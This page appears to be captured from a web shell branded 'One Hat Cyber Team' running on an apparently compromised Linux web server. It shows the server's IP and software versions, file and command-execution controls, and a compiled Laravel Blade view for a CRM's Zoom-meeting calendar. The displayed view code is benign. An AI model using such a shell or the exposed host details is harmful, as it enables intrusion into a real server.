⚝
One Hat Cyber Team
⚝
Your IP:
172.22.0.1
Server IP:
151.80.20.34
Server:
Linux 794f04d97d5e 5.15.0-143-generic #153-Ubuntu SMP Fri Jun 13 19:10:45 UTC 2025 x86_64
Server Software:
Apache/2.4.62 (Debian)
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
html
/
storage
/
framework
/
views
/
View File Name :
cc166df1ffa7c304879f445d982dc68e.php
<?php $__env->startSection('page-title'); ?> <?php echo e(__('Manage Zoom-Meeting')); ?> <?php $__env->stopSection(); ?> <?php $setting = \App\Models\Utility::settings(); ?> <?php $__env->startSection('breadcrumb'); ?> <li class="breadcrumb-item"><a href="<?php echo e(route('dashboard')); ?>"><?php echo e(__('Dashboard')); ?></a></li> <li class="breadcrumb-item"><?php echo e(__('Zoom Meeting')); ?></li> <?php $__env->stopSection(); ?> <?php $__env->startSection('action-btn'); ?> <div class="float-end"> <a href="<?php echo e(route('zoom-meeting.index')); ?>" class="btn btn-sm btn-primary" data-bs-toggle="tooltip" title="<?php echo e(__('List View')); ?>" data-original-title="<?php echo e(__('List View')); ?>"> <i class="ti ti-list"></i> </a> <?php if (app(\Illuminate\Contracts\Auth\Access\Gate::class)->check('create zoom meeting')): ?> <a href="#" data-size="lg" data-url="<?php echo e(route('zoom-meeting.create')); ?>" data-ajax-popup="true" data-bs-toggle="tooltip" title="<?php echo e(__('Create')); ?>" data-title="<?php echo e(__('Create New Meeting')); ?>" class="btn btn-sm btn-primary"> <i class="ti ti-plus"></i> </a> <?php endif; ?> </div> <?php $__env->stopSection(); ?> <?php $__env->startPush('script-page'); ?> <script src="<?php echo e(asset('assets/js/plugins/main.min.js')); ?>"></script> <script type="text/javascript"> $(document).ready(function() { get_data(); }); function get_data() { var calender_type=$('#calender_type :selected').val(); $('#calendar').removeClass('local_calender'); $('#calendar').removeClass('goggle_calender'); if(calender_type==undefined){ $('#calendar').addClass('local_calender'); } $('#calendar').addClass(calender_type); $.ajax({ url: $("#zoom_calendar").val()+"/zoom-meeting/get_zoom_meeting_data" , method:"POST", data: {"_token": "<?php echo e(csrf_token()); ?>",'calender_type':calender_type}, success: function(data) { (function () { var etitle; var etype; var etypeclass; var calendar = new FullCalendar.Calendar(document.getElementById('calendar'), { headerToolbar: { left: 'prev,next today', center: 'title', right: 'timeGridDay,timeGridWeek,dayGridMonth' }, buttonText: { timeGridDay: "<?php echo e(__('Day')); ?>", timeGridWeek: "<?php echo e(__('Week')); ?>", dayGridMonth: "<?php echo e(__('Month')); ?>" }, slotLabelFormat: { hour: '2-digit', minute: '2-digit', hour12: false, }, themeSystem: 'bootstrap', // slotDuration: '00:10:00', allDaySlot:false, navLinks: true, droppable: true, selectable: true, selectMirror: true, editable: true, dayMaxEvents: true, handleWindowResize: true, height: 'auto', timeFormat: 'H(:mm)', events: data, }); calendar.render(); })(); } }); } </script> <?php $__env->stopPush(); ?> <?php $__env->startSection('content'); ?> <div class="row"> <div class="col-md-8"> <div class="card"> <div class="card-header"> <div class="row"> <div class="col-lg-6"> <h5><?php echo e(__('Calendar')); ?></h5> </div> <div class="col-lg-6"> <?php if(isset($setting['google_calendar_enable']) && $setting['google_calendar_enable'] == 'on'): ?> <select class="form-control" name="calender_type" id="calender_type" onchange="get_data()"> <option value="goggle_calender"><?php echo e(__('Google Calender')); ?></option> <option value="local_calender" selected="true"><?php echo e(__('Local Calender')); ?></option> </select> <?php endif; ?> <input type="hidden" id="zoom_calendar" value="<?php echo e(url('/')); ?>"> </div> </div> </div> <div class="card-body"> <div id='calendar' class='calendar' data-toggle="calendar"></div> </div> </div> </div> <div class="col-lg-4"> <div class="card"> <div class="card-body"> <h4 class="mb-4"><?php echo e(__('Mettings')); ?></h4> <ul class="event-cards list-group list-group-flush mt-3 w-100"> <?php $__currentLoopData = $calandar; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $event): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php $month = date("m",strtotime($event['start'])); ?> <?php if($month == date('m')): ?> <li class="list-group-item card mb-3"> <div class="row align-items-center justify-content-between"> <div class="col-auto mb-3 mb-sm-0"> <div class="d-flex align-items-center"> <div class="theme-avtar bg-primary"> <i class="ti ti-video"></i> </div> <div class="ms-3"> <h6 class="m-0"> <a href="<?php echo e($event['url']); ?>" class="fc-daygrid-event" style="white-space: inherit;"> <div class="fc-event-title-container"> <div class="fc-event-title text-dark"><?php echo e($event['title']); ?></div> </div> </a> </h6> <small class="text-muted"><?php echo e($event['start']); ?></small> </div> </div> </div> </div> </li> <?php endif; ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </ul> </div> </div> </div> </div> <?php $__env->stopSection(); ?> <?php echo $__env->make('layouts.admin', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /var/www/crm/resources/views/zoom-meeting/calender.blade.php ENDPATH**/ ?>